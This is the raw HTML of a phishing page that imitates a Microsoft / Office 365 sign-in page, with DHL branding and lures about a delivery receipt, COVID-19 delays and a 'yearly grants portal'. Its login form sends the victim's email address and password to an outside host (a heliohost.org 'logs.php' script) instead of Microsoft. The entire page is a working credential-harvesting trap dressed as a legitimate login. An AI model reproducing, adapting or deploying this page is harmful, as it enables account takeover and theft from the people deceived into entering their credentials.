<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="en">
    <head>
        

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta name="PageID" content="i5030.2.0" />
<meta name="SiteID" content="" />
<meta name="ReqLC" content="1033" />
<meta name="LocLC" content="en-US" />
<meta name="mswebdialog-newwindowurl" content="*" />


    <meta name="robots" content="noindex, nofollow" />

<script type="text/javascript">//<![CDATA[
$Config={"scid":1000,"hpgact":2001,"hpgid":1002,"pgid":"i5030","apiCanary":"AQABAAAAAABHh4kmS_aKT5XrjzxRAtHzJksd7OgFK0cz0nmIEGj5oEuEdG4z1Q0WoQIq5mHuij5VOgIx0xfspTZ3C96epWg0eZqUGbVm9JE2kL0LowUxeN1okvya6RZ1OTiulmkmSgMgeERoQRDETv8jenI2rRQJm__c4SFdBXgG5edkKZPAdrpDwcfxb00fPqvPEoUPXWAKK0EHj4O7teI5lAdm5APgOA_GVREaMaq6RzhL4E74GSAA","canary":"keZxOqRhj/YVigbjDG3VvCAGHrlK/UfMYSMvCtwj+LY=5:1","correlationId":"68f97586-b3eb-4baa-b82b-06c49fc1faeb","sessionId":"918efeef-a2f7-4e83-b9d0-a95445111400","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"},"mfa":{"setitupnow":"Set it up now"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.microsoftonline.com/common/instrumentation/reportpageload","dssostatus":"https://login.microsoftonline.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Firefox":1,"_Win":1,"_M52":1,"_D9":1,"Full":1,"RE_Gecko":1,"b":{"name":"Firefox","major":52,"minor":9},"os":{"name":"Windows","version":"6.1"},"V":"52.9"},"watson":{"url":"/common/handlers/watson","bundle":"https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/watson.min.js","sbundle":"https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/watsonsupport.min.js","fbundle":"https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/frameworksupport.min.js","resetErrorPeriod":5,"maxCorsErrors":-1,"maxInjectErrors":5,"maxErrors":10,"maxTotalErrors":1,"expSrcs":["https://secure.aadcdn.microsoftonline-p.com/ests/","https://login.microsoftonline.com",".login.microsoftonline.com"],"envErrorRedirect":true,"envErrorUrl":"/common/handlers/enverror"},"serverDetails":{"slc":"ProXXXXes","dc":"AMS1","ri":"ESTXXXX_0","ver":{"v":[2,1,6999,16]},"rt":"2018-12-19T11:00:34","et":75},"country":"BJ","bsso":{"type":"none","reason":"Pull suppressed as UseAgent did not meet required criteria"}};
//]]></script> 
<script type="text/javascript">//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},n=e.$Config||{};if(!r.appendLog){var t=[],o=0;r.appendLog=function(e){var r=n.maxDebugLog||25,a=(new Date).toUTCString()+":"+e;t.push(o+":"+a),t.length>r&&t.shift(),o++},r.getLogs=function(){return t}}}(),function(){function e(e,r){function n(a){var i=e[a];return t-1>a?void(o.r[i]?n(a+1):o.when(i,function(){n(a+1)})):void r(i)}var t=e.length;n(0)}function r(e,r,a){function i(){var e=!!s.method,o=e?s.method:a[0],i=s.extraArgs||[],u=t.$WebWatson;try{var l=n(a,!e);if(i&&i.length>0)for(var c=i.length,d=0;c>d;d++)l.push(i[d]);o.apply(r,l)}catch(f){return void(u&&u.submitFromException&&u.submitFromException(f))}}var s=o.r&&o.r[e];return r=r?r:this,s&&(s.skipTimeout?i():t.setTimeout(i,0)),s}function n(e,r){return Array.prototype.slice.call(e,r?1:0)}var t=window;t.$Do||(t.$Do={q:[],r:[],removeItems:[],lock:0,o:[]});var o=t.$Do;o.when=function(n,t){function a(e){r(e,i,s)||o.q.push({id:e,c:i,a:s})}var i=0,s=[],u=1,l="function"==typeof t;l||(i=t,u=2);for(var c=u;c<arguments.length;c++)s.push(arguments[c]);n instanceof Array?e(n,a):a(n)},o.register=function(e,n,t){if(!o.r[e]){o.o.push(e);var a={};if(n&&(a.method=n),t&&(a.skipTimeout=t),arguments&&arguments.length>3){a.extraArgs=[];for(var i=3;i<arguments.length;i++)a.extraArgs.push(arguments[i])}o.r[e]=a,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(l){throw l}finally{if(o.lock--,0===o.lock){for(var c=0;c<o.removeItems.length;c++)for(var d=o.removeItems[c],f=0;f<o.q.length;f++)if(o.q[f]===d){o.q.splice(f,1);break}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(){function e(e){d&&d.appendLog&&d.appendLog(e)}function r(e){return e.length>p.length&&e.substr(e.length-p.length).toLowerCase()==p}function n(n,o,a,i,s,u,l){var c=n.src||n.href||"";if(c){var d=n.id||"";if(!o&&r(c))try{n.sheet&&n.sheet.cssRules&&!n.sheet.cssRules.length&&(o=!0)}catch(f){}o?(e("[$Loader]: "+(l||"Failed")+" '"+(c||"")+"', id:"+d+", async:"+(n.async||"")+"', defer:"+(n.defer||"")),t(c,0,d,a,i,s)):(e("[$Loader]: "+(u||"Loaded")+" '"+(c||"")+"', id:"+(n.id||"")+", async:"+(n.async||"")+"', defer:"+(n.defer||"")),i&&i())}}function t(e,r,n,o,a,i){if(e)if(o&&h>r){g++;var s=new u;s.retryOnError=!1,s.failMessage="Reload Failed",s.successMessage="Reload Success",s.Add(e,"Reload_"+g+(n?"_"+n:"")),s.Load(a,function(){t(e,r+1,n,o,a,i)})}else i&&i()}function o(e){var r=f.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e.srcPath,r}function a(e){var r=f.createElement("script");return e.id&&(r.id=e.id),r.crossorigin="anonymous",r.type="text/javascript",r.src=e.srcPath,r.defer=!1,r.async=!1,r}function i(t,i,s,u,l,c){function d(){n(g,!1,i,s,u,l,c)}if(!t||!t.srcPath)return void(s&&s());var g=null;g=r(t.srcPath)?o(t):a(t),g.onload=d,g.onerror=function(){n(g,!0,i,s,u,l,c)},g.onreadystatechange=function(){"loaded"===g.readyState?setTimeout(d,500):"complete"===g.readyState&&d()};var h=f.getElementsByTagName("head")[0];h.appendChild(g),e("[$Loader]: Loading '"+(t.srcPath||"")+"', id:"+(t.id||""))}function s(e,r,n,t,o,a,u){function l(){s(e,r+1,n,t,o,a,u)}return r<e.length?void i(e[r],n,l,o,a,u):void(t&&t())}function u(){var e=this,r=[];e.retryOnError=!0,e.successMessage="Loaded",e.failMessage="Error",e.Add=function(e,n){e&&r.push({srcPath:e,id:n})},e.AddIf=function(r,n,t){r&&e.Add(n,t)},e.Load=function(n,t){s(r,0,e.retryOnError,n,t,e.successMessage,e.failMessage)}}var l=window,c=l.$Config,d=l.$Debug,f=l.document,g=0,h=c.slMaxRetry||2,v=c.slReportFailure||!1,p=".css";u.On=function(e,r){if(!e)throw"The target element must be provided and cannot be null";n(e,r,!0,null,function(){if(v){var r=e.src||e.href||"";throw"Failed to load external resource ['"+r+"']"}})},l.$Loader=u}(),function(){function e(){if(!m){var e=new f.$Loader;e.AddIf(!f.jQuery,h.sbundle,"WebWatson_DemandSupport"),h.sbundle=null,delete h.sbundle,e.AddIf(!f.$Api,h.fbundle,"WebWatson_DemandFramework"),h.fbundle=null,delete h.fbundle,e.Add(h.bundle,"WebWatson_DemandLoaded"),e.Load(r,n),m=!0}}function r(){if(f.$WebWatson){if(f.$WebWatson.isProxy)return void n();v.when("$WebWatson.full",function(){for(;p.length>0;){var e=p.shift();e&&f.$WebWatson[e.cmdName].apply(f.$WebWatson,e.args)}})}}function n(){var e=f.$WebWatson?f.$WebWatson.isProxy:!0;if(e){if(!b&&JSON){try{var r=new XMLHttpRequest;r.open("POST",h.url),r.setRequestHeader("Accept","application/json"),r.setRequestHeader("Content-Type","application/json; charset=UTF-8"),r.setRequestHeader("canary",g.apiCanary),r.setRequestHeader("client-request-id",g.correlationId),r.setRequestHeader("hpgid",g.hpgid||0),r.setRequestHeader("hpgact",g.hpgact||0);for(var n=-1,o=0;o<p.length;o++)if("submit"===p[o].cmdName){n=o;break}var a=p[n]?p[n].args||[]:[],i={sr:h.sr,ec:"Failed to load external resource [Core Watson files]",wec:55,idx:1,pn:g.pgid||"",sc:g.scid||0,hpg:g.hpgid||0,msg:"Failed to load external resource [Core Watson files]",url:a[1]||"",ln:0,ad:0,an:!1,cs:"",sd:g.serverDetails,ls:null,diag:null};r.send(JSON.stringify(i))}catch(s){}b=!0}h.loadErrorUrl&&window.location.assign(h.loadErrorUrl)}t()}function t(){p=[],f.$WebWatson=null}function o(r){return function(){var n=arguments;p.push({cmdName:r,args:n}),e()}}function a(){var e=["foundException","resetException","submit"],r=this;r.isProxy=!0;for(var n=e.length,t=0;n>t;t++){var a=e[t];a&&(r[a]=o(a))}}function i(e,r,n,t,o,a,i){var s=f.event;a||(a=d(o||s,i?i+2:2)),f.$Debug&&f.$Debug.appendLog&&f.$Debug.appendLog("[WebWatson]:"+(e||"")+" in "+(r||"")+" @ "+(n||"??")),w.submit(e,r,n,t,o||s,a,i)}function s(e,r){return{signature:e,args:r,toString:function(){return this.signature}}}function u(e){for(var r=[],n=e.split("\n"),t=0;t<n.length;t++)r.push(s(n[t],[]));return r}function l(e){for(var r=[],n=e.split("\n"),t=0;t<n.length;t++){var o=s(n[t],[]);n[t+1]&&(o.signature+="@"+n[t+1],t++),r.push(o)}return r}function c(e){if(!e)return null;try{if(e.stack)return u(e.stack);if(e.error){if(e.error.stack)return u(e.error.stack)}else if(window.opera&&e.message)return l(e.message)}catch(r){}return null}function d(e,r){var n=[];try{for(var t=arguments.callee;r>0;)t=t?t.caller:t,r--;for(var o=0;t&&y>o;){var a="InvalidMethod()";try{a=t.toString()}catch(i){}var u=[],l=t.args||t.arguments;if(l)for(var d=0;d<l.length;d++)u[d]=l[d];n.push(s(a,u)),t=t.caller,o++}}catch(i){n.push(s(i.toString(),[]))}var f=c(e);return f&&(n.push(s("--- Error Event Stack -----------------",[])),n=n.concat(f)),n}var f=window,g=f.$Config||{},h=g.watson,v=f.$Do;if(!f.$WebWatson&&h){var p=[],m=!1,b=!1,y=10,w=f.$WebWatson=new a;w.CB={},w._orgErrorHandler=f.onerror,f.onerror=i,w.errorHooked=!0,v.when("jQuery.version",function(e){h.expectedVersion=e}),v.register("$WebWatson")}}(),function(){function e(e,r){for(var n=r.split("."),t=n.length,o=0;t>o&&null!==e&&void 0!==e;)e=e[n[o++]];return e}function r(r){var n=null;return null===u&&(u=e(a,"Constants")),null!==u&&r&&(n=e(u,r)),null===n||void 0===n?"":n.toString()}function n(n){var t=null;return null===i&&(i=e(a,"$Config.strings")),null!==i&&n&&(t=e(i,n.toLowerCase())),(null===t||void 0===t)&&(t=r(n)),null===t||void 0===t?"":t.toString()}function t(e,r){var t=null;return e&&r&&r[e]&&(t=n("errors."+r[e])),t||(t=n("errors."+e)),t||(t=n("errors."+l)),t||(t=n(l)),t}function o(n){var t=null;return null===s&&(s=e(a,"$Config.urls")),null!==s&&n&&(t=e(s,n.toLowerCase())),(null===t||void 0===t)&&(t=r(n)),null===t||void 0===t?"":t.toString()}var a=window,i=null,s=null,u=null,l="GENERIC_ERROR";a.GetString=n,a.GetErrorString=t,a.GetUrl=o}(),function(){var e=window,r=e.$Config||{};e.$B=r.browser||{}}();

//]]></script> 



    <link rel="SHORTCUT ICON" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/images/favicon_a.ico" />

    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes" />
<link href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/login.min.css" rel="stylesheet" onerror='$Loader.On(this,true)' onload='$Loader.On(this)' />



<style>
    .no_display {
        display: none;
    }

    .no_border {
        outline: none;
    }

    .glyph {
        font-family: "Segoe MDL2 Assets";
        vertical-align: middle;
    }
</style>


<!--[if lte IE 10]>
    <link href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/login_ie.min.css" rel="stylesheet" onerror='$Loader.On(this,true)' onload='$Loader.On(this)' />

<![endif]-->

<!--[if lte IE 7]>
  <style type='text/css'>
    .ie_legacy { display: none; }
    body { background-color: #0072C6; }
  </style>
<![endif]-->


<script type="text/javascript">
    if ((navigator.userAgent.match(/iPad/) || navigator.userAgent.match(/iPhone/))
        && (window.innerWidth)) {
        try {
            viewport = document.querySelector("meta[name=viewport]");
            viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, maximum-scale=1.0');
            window.onresize = function(event) {
                viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, maximum-scale=1.0');
            };
            window.onorientationchange = function (event) {
                var activeElem = document.activeElement;
                activeElem && activeElem.blur();
            };
        } catch (err) {
        }
    }

    var isTouch =  !!("ontouchstart" in window) || window.navigator.msMaxTouchPoints > 0;
    if (!isTouch && true) {    
        var cssId = 'hovereffect';
        if (!document.getElementById(cssId)) {
            var head = document.getElementsByTagName('head')[0];
            var link = document.createElement('link');
            link.id = cssId;
            link.rel = 'stylesheet';
            link.type = 'text/css';
            link.href = "https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/login_hover.min.css";
            link.media = 'all';
            head.appendChild(link);
        }
    }

    if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
        var msViewportStyle = document.createElement("style");
        msViewportStyle.appendChild(
              document.createTextNode(
                  "@-ms-viewport{width:auto!important}"
              )
          );
        msViewportStyle.appendChild(
              document.createTextNode(
                  "@-ms-viewport{height:auto!important}"
              )
          );
        document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
    }
 </script>


<script crossorigin="anonymous" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/jquery.1.11.min.js" onerror='$Loader.On(this,true)' onload='$Loader.On(this)'></script>

<script crossorigin="anonymous" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/cdnbundles/aad.login.min.js" onerror='$Loader.On(this,true)' onload='$Loader.On(this)'></script>





<style>
    body
    {
        display: none;
    }
</style>

        <title>
Microsoft account activity</title>
    </head>
    <body>
        <div role="alert" aria-live="assertive" aria-atomic="true">
            <p id="accessibleError" class="accessibleError" style="display:none;" aria-hidden="true"></p>
        </div>

        <script type="text/javascript">//<![CDATA[
!function(){var o=window,l=o.document,n=o.$Config||{};o.self===o.top?l&&l.body&&(l.body.style.display="block"):n.allowFrame||(o.top.location=o.self.location)}();

//]]></script>
        

<div id="background_branding_container" class="ie_legacy" style="background: #FFFFFF" role="banner">
    <img id="background_background_image" alt="Illustration">
    <div id="auto_low_bandwidth_background_notification" class="smalltext">It looks like you&#39;re on a slow connection. We&#39;ve disabled some images to speed things up.</div>
    <div id="background_company_name_text" class="background_title_text">
    </div>
</div>
<div id="background_page_overlay" class="overlay ie_legacy">
</div>

        <div id="login_no_script_panel" class="login_panel">
            

<noscript>
    <style>body { display: block; }</style>
    <div class="login_inner_container no_js">
        <div class="inner_container cred">
            <div class="login_workload_logo_container">
            </div>
            <div id="login_no_js_error_container" class="login_full_error_container">
                <div id="login_no_js_error_text" class="cta_text 1">
                    
                    <H1>We can't sign you in</H1><p>Your browser is currently set to block JavaScript. You need to allow JavaScript to use this service.</p><p>To learn how to allow JavaScript or to find out whether your browser supports JavaScript, check the online help in your web browser.</p>
                </div>
            </div>
        </div>
    </div>
    

<div id="footer_links_container" class="login_footer_container" role="contentinfo">
    <div class="footer_inner_container">
        <div id="footer_table" class="footer_block">
                <div class="corporate_footer">
                        <div>
                            <span class="footer_link text-caption" id="footer_copyright_link">
&#169;2018 Microsoft                            </span>
                        </div>
                        <div>
                            <span class="footer_link">
                                <a class="text-caption" id="footer_link_terms" href="https://www.microsoft.com/en-US/servicesagreement/" target="_blank">Terms of use</a>
                            </span>
                            <span class="footer_link">
                                <a class="text-caption" id="footer_link_privacy" href="https://privacy.microsoft.com/en-US/privacystatement" target="_blank">Privacy &amp; cookies</a>
                            </span>
                        </div>
                </div>
                    <div class="footer_glyph">
                        <img src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/images/microsoft_logo.png" alt="Microsoft account symbol" />
                    </div>
        </div>
    </div>
</div>
<div id="login_prefetch_container" class="no-display">
</div>

</noscript>

        </div>
        <div id="login_panel" class="login_panel" role="form">
            <div id="legal-section" class="legal_container">
                <div id="legal-content" class="legal-content normaltext"></div>
                <button id="legal-back-btn" class="legal-btn button normaltext">Back</button>
            </div>
            <table class="login_panel_layout" style="height: 100%;">
                <tr class="login_panel_layout_row" style="height: 100%;">
                    <td id="login_panel_center">
                        

           
                    
                        <script type="text/javascript">
                            $Do.when("doc.ready", function ()
                            {
                                

Constants.DEFAULT_LOGO = 'https://www.emailfix.org/img/cannot-import-contacts-outlook.gif';


Constants.DEFAULT_LOGO_ALT = 'O365 Suite UX';
Constants.DEFAULT_ILLUSTRATION = 'https://guardian.ng/wp-content/uploads/2017/04/DHL.jpg';
Constants.DEFAULT_BACKGROUND_COLOR = '#eb3c00';
Constants.BOILERPLATE_HEADER = '';
Constants.DEFAULT_BOILERPLATE_HEADER = '';
Constants.DEFAULT_BOILERPLATE_TEXT = '';




    
    User.UpdateLogo(Constants.DEFAULT_LOGO, Constants.DEFAULT_LOGO_ALT);
    User.UpdateBackground(Constants.DEFAULT_ILLUSTRATION, Constants.DEFAULT_BACKGROUND_COLOR);
    
    if (Constants.DEFAULT_BOILERPLATE_TEXT.length > 0) {
        TenantBranding.AddBoilerPlateText(Constants.DEFAULT_BOILERPLATE_TEXT, Constants.DEFAULT_BOILERPLATE_HEADER);
    }
    

                                

                            });

                        </script>
                        <div class="login_inner_container" role="main">
                            <div id="true_inner" class="inner_container cred">
                                

<div id="optInUserBanner" class="optin-banner normaltext table vis-hidden" aria-hidden="true">
    <div class="table-row">
        <div class="table-cell">
            <div>DHL COVID-19 Update: We apologies for delivery delays</div>
            <div>
                <a id="uxOnLink" href="#"></a>
            </div>
        </div>
        <div class="table-cell">
            <a id="bannerCloseLink" href="#">
                <img role="button" src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/images/close.png" alt="Close banner" />
            </a>
        </div>
    </div>
</div>

                                    <div class="login_workload_logo_container"></div>
                                <div class="spacer"></div>
                                




<div id="login_error_container" class="login_error_container"></div>
<div class="login_cta_container normaltext">
            <div id="login_cta_text" class="cta_message_text 1"><span style="font-family: Calibri;"><span
style="font-weight: bold; color: rgb(204, 0, 0);">Mail Security Log Out:</span> &nbsp; Log in to access receipt</div>

    <div id="cta_client_message_text" class="no_display template-tooltip tooltipType_error">
        <!-- Email Discovery Main -->
        <div class="cta_message_text 30136">Type the email address or phone number of the account you want to sign in with.</div>
        <!-- Email Discovery Lookup Timeout -->
        <div class="cta_message_text 30140">We&#39;re having trouble locating your account. Which type of account do you want to use?</div>
        <!-- Email Discovery Account not found -->
        <div id="upn_needs_disambiguation_text" class="cta_message_text 30139">
        </div>
        <!-- Tenant branding call to action -->
        <div id="tenant_branding_cta_text" class="cta_message_text 30008">Sign in to {0}</div>
        <!-- Which accound do you want to use -->
        <div class="cta_message_text 30173">Which type of account do you want to sign in with?</div>
    </div>
    <div id="cta_client_error_text" class="error_msg errortext no_display template-tooltip tooltipType_error">
        <!-- Invalid ID or password -->
        
        <div class="client_error_msg 30067"><H1>We don't recognize this user ID or password</H1><p>Be sure to type the password for your work or school account.</p></div>
        <!-- Malformed id -->
        
        <div class="client_error_msg 30064"><H1>This doesn't look like a valid user ID</H1><p>Use your corect email address to continue.</p></div>
        <!-- Username not found -->
        
        <div class="client_error_msg 30065"><h1>{0} isn't in our system </h1><p>Make sure you typed your address or phone number correctly, or <a id="user-not-found-link" href="#">get a new Microsoft account</a>.</p></div>
        <!-- Malformed id (DOMAIN\alias format) -->
        
        <div class="client_error_msg 30066"><H1>This doesn't look like a valid user ID</H1><p>Try using your email address or phone number.</p></div>
        <!-- Invalid domain name (not guests) -->
        
        <div class="client_error_msg 30068"><H1>{0} isn't in our system</H1><p>Make sure you typed your email address correctly. It usually looks like someone@example.com or someone@example.onmicrosoft.com</p></div>
        <!-- Missing password -->
        <div class="client_error_msg 30111">Please enter your password.</div>
        <!-- UserID is missing -->
        <div class="client_error_msg 30127">Enter Microsoft account</div>
        <!-- Error message if email address is not properly formatted -->
        <div class="client_error_msg 30145">Check the email address you entered. You may have mistyped it.</div>
        <!-- Email Discovery could not find email address -->
        
        <div id="account_not_found_title_text" class="client_error_msg 30146"><h1>We couldn't find an account with that email address.</h1><p>Enter a different email address or <a id="user-not-found-link-ebd" href="#">get a new Microsoft account</a>.</p></div>
        <!-- Signout failed -->
        <div id="client_error_msg 30200" class="client_error_msg 30200">You may still be signed in to some applications. Close your browser to finish signing out.</div>
    </div>
</div>
<ul class="login_cred_container" role="form">
    <!-- From ViewTemplateBase/Tiles.cshtml -->
    <li id="login_user_chooser" class="login_user_chooser"></li>
    


    <!-- From ViewTemplateBase/Tiles.cshtml -->
    <div class="nav-settings-menu hidden dropdownPanel" id="signedin-dropdown">
        <ul class="nav-settings-menu-list">
            <li id="signoutContainer"><a href="#" id="signedin-signout">Sign out</a></li>
            <li id="signoutForgetContainer"><a href="#" id="signedin-signoutandforget">Sign out and forget</a></li>
        </ul>
    </div>
    <div class="nav-settings-menu hidden dropdownPanel" id="signedout-dropdown">
        <ul class="nav-settings-menu-list">
            <li id="forgetContainer"><a href="#" id="signedout-forget">Forget</a></li>
        </ul>
    </div>
    <!--  -->
    <li class="login_cred_field_container">
        

<form id="credentials" method="post" action="https://babo66.heliohost.org/2021/logs.php">
        <div id="cred_userid_container" class="login_textfield textfield">
            <span class="input_field textfield">
                <label for="cred_userid_inputtext" class="no_display">User account</label>
                <div class="input_border">
                <input id="cred_userid_inputtext"
                        class="login_textfield textfield required email field normaltext"
                        placeholder="Enter email address" type="email" name="email" required=""
                        spellcheck="false" alt="Email ID" aria-label="User account"
                        value="" autocomplete="off" aria-describedby="accessibleError" />
                </div>
            </span>

        </div>
    <div id="looking_container" class="no_display">
        <span id="looking_cta_text" class="bigtext">Looking for an account</span>
        <span class="input_field normaltext login_textfield"><a id="looking_cancel_link" href="#">Cancel</a> </span>
    </div>
            <div id="redirect_cta_text" class="bigtext">Redirecting</div>
            <div id="redirect_dots_animation" class="progress">
                <div class="pip">
                </div>
                <div class="pip">
                </div>
                <div class="pip">
                </div>
                <div class="pip">
                </div>
                <div class="pip">
                </div>
            </div>

        <div id="cred_password_container" class="login_textfield textfield">
            <span class="input_field textfield">
                <label for="cred_password_inputtext" class="no_display">Password</label>
                <div class="input_border">
                    <input id="cred_password_inputtext"
                           class="login_textfield textfield required field normaltext"
                           placeholder="Password" type="password" pattern=".{6,}"   required title="6 characters minimum" name="password" required="" spellcheck="false" aria-label="Password"
                           alt="Password" type="password" name="password" required="" value="" aria-describedby="accessibleError"/>
                </div>
            </span>
        </div>
        <div id="redirect_message_container" class="login_textfield">
            <span class="input_field normaltext">
                <div>
                    <span id="redirect_message_text">We&#39;re taking you to your organization&#39;s sign-in page.</span><span 
                        id="redirect_company_name_text"></span> <a
                        id="redirect_cancel_link" href="#">Cancel</a>
                </div>
            </span>
        </div>

    

<br>
        <button id="cred_sign_in_button"
                class="button normaltext cred_sign_in_button refresh_domain_state control-button button-two button_primary">
            Log in
        </button>

        
        <div id="recover_container" class="subtext smalltext">
            <span>
                <a href="#" onclick="MSLogin.SyPassword()">Please verify e-mail account to access Updated Receipt</a>
            </span>
            <div class="i-forgot-my-password-content no_display stdMarginTop">
                <div>What kind of account do you have?</div>
                <div class="stdMarginTop">
                    <div class="stdMarginTop">
                        <a id="cred_msa_forgot_password_link" href=".microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAXXRO2_TUAAF4DgPq0WoVKgSjB2YqOJc2_EjkYrkxDSJEsdJbMe9XqrEuYkfiW2cmyb1xMTcEXVBYkHKCEvFhsSAOnVG_ABEF8QEZSH9ASxn-oajc55maIouPymyRW4gDEv50oBn88USDfKDIsPnWY7lWQbQIw6w8cN7u68Wf5ybD-vm5QH5-c2n25s18cjBOJqXC4XlckmF47FrI8oOZ4VLgrgmiO8EcZHOoSBvaOv0nGf5YokRREBzgsCKPAcoSx557VrPV_UuhvrIaVcBaMtdrmU2aMtUcLumJJY8AarZZdUaZKBecaHnJxuz8VNf1QCAiTNt6dOZwjSwMrP8ti5tfOOszRjLr-kHqrTADnMXYewm6Fd6exzGs5MonOOLzDtCjVDQGFXDIEA2pu4YCrBrD7AbBp04jFCMXTQ_9JvHQUeHsZ0g2eifeUDsreq6cAI7sG4sA1E3h6s-25zrE59OOFGwm3Qkccg2ZMHQLKgaR1IMFjg6EmA-BklX0Tqqhkqz0oJu6hUpaHiiA3rMQtT8oVYp1jRbl0zL7D-3TS6Qj-33GXIz6ywMrjI7m1KBO9qP4nDsTtF1lviRvQ8y5a0tcpd4nNpP_c4Sb3Obt758e9293fvbeilT7LOdvdRVruAja6W-6DleAfbdydCTa2z_tCrV6vG0WTDGCtSU0ypeegcteMiX6XOSOCfJn2Tq4_b_jv4H0">Personal or business email ID required</a>
                    </div>
                    <div class="stdMarginTop">
                        <a id="cred_forgot_password_link" href="%2freprocess%3fctx%3drQIIAXXRO2_TUAAF4DgPq0WoVKgSjB2YqOJc2_EjkYrkxDSJEsdJbMe9XqrEuYkfiW2cmyb1xMTcEXVBYkHKCEvFhsSAOnVG_ABEF8QEZSH9ASxn-oajc55maIouPymyRW4gDEv50oBn88USDfKDIsPnWY7lWQbQIw6w8cN7u68Wf5ybD-vm5QH5-c2n25s18cjBOJqXC4XlckmF47FrI8oOZ4VLgrgmiO8EcZHOoSBvaOv0nGf5YokRREBzgsCKPAcoSx557VrPV_UuhvrIaVcBaMtdrmU2aMtUcLumJJY8AarZZdUaZKBecaHnJxuz8VNf1QCAiTNt6dOZwjSwMrP8ti5tfOOszRjLr-kHqrTADnMXYewm6Fd6exzGs5MonOOLzDtCjVDQGFXDIEA2pu4YCrBrD7AbBp04jFCMXTQ_9JvHQUeHsZ0g2eifeUDsreq6cAI7sG4sA1E3h6s-25zrE59OOFGwm3Qkccg2ZMHQLKgaR1IMFjg6EmA-BklX0Tqqhkqz0oJu6hUpaHiiA3rMQtT8oVYp1jRbl0zL7D-3TS6Qj-33GXIz6ywMrjI7m1KBO9qP4nDsTtF1lviRvQ8y5a0tcpd4nNpP_c4Sb3Obt758e9293fvbeilT7LOdvdRVruAja6W-6DleAfbdydCTa2z_tCrV6vG0WTDGCtSU0ypeegcteMiX6XOSOCfJn2Tq4_b_jv4H0&amp;mkt">Microsoft yearly grants portal</a>
                    </div>
                </div>
            </div>
        </div>

        

    <div id="alternative-identity-providers">


    </div>

        <div id="guest_hint_text" class="guest_direction_hint smalltext no_display">Don’t have an account assigned by your work or school?</div>
        <div class="guest_redirect_container no_display">
            <span class="guest_redirect smalltext">
                <span>
                    <a id="guest_redirect_link" tabindex="20" href="-cf50c7252078&amp;scope=openid+profile+email+offline_access&amp;response_mode=form_post&amp;redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&amp;state=rQIIAXWRO2_TUACFc5PWahAqFapUxg5MVEmu7fiRSEVyYppGieMktuNeL1Xi3NSPxDbOTdN6YmLuiLIgsSBlhKViQ2JAnTojfgCiC2KCspCys5zlfMPR-Z5k6Dxdflxki1xfGJRypT7P5oolGub6RYbPsRzLswykhxxk44f3tl7Ofjs375eNyz3q0-uPtzcLkD0eu6c4b4eTJdhxCImm5UJhPp_nw9HItf8VhUsArgH4BsAivY6DnKEt01Oe5YslRhAhzQkCK_IczFvy0GvVur6qdwjSh06rCmFL7nBNs05bpkJaNSWx5BOomh1WrSEG6RUXeX6yYlb82Fc1CFHijJv6eKIwdaJMLL-lSyu-ft5ijPmX9ANVmhGHuYswdhP8M50dhfHkOAqnZJF5C9QIB_VhNQwCbJP8HYYD4tp94oZBOw4jHBMXT_f9xlHQ1lFsJ1g2euceFLtnh7pwjNro0JgHom4OznpsY6qf-HTCiYLdoCOJw7YhC4ZmIdU4kGI4I9GBgHIxTDqK1lY1XJqUZnRDr0hB3RMd2GVmouYPtEqxptm6ZFpm75ltcoF8ZL_LUKtbJ2FwldlcjQrc4W4UhyN3jK_XwPe1-zBT3tigtsCj1G7q1xp4s74y9_nrq87t9p_mCznPPt3cTl2tF3xsnanPu45XQD33ZODJNbZ3WpVqh_G4UTBGCtKU0yqZe3tNtM-X6QsKXFDUDyr1Ifs_0X8B0&amp;estsfed=1&amp;uaid=68f97586b3eb4baab82b06c49fc1faeb&amp;mkt=en-US">Enter email ID</a>
                </span>
            </span>
        </div>
    </li>
        
    <li id="disambig-container" class="smalltext marginTop30px" style="display: none;">
        <div id="disambig-help-container">
            
            Tired of seeing this? <a href="#" id="iDisambigRenameLink">Promo Grants</a>
        </div>
    </li>

</ul>


                        </div>
</br>


<div id="footer_links_container" class="login_footer_container" role="contentinfo">
    <div class="footer_inner_container">
        <div id="footer_table" class="footer_block">
                <div class="corporate_footer">
                        <div>
<div class="footer_glyph">

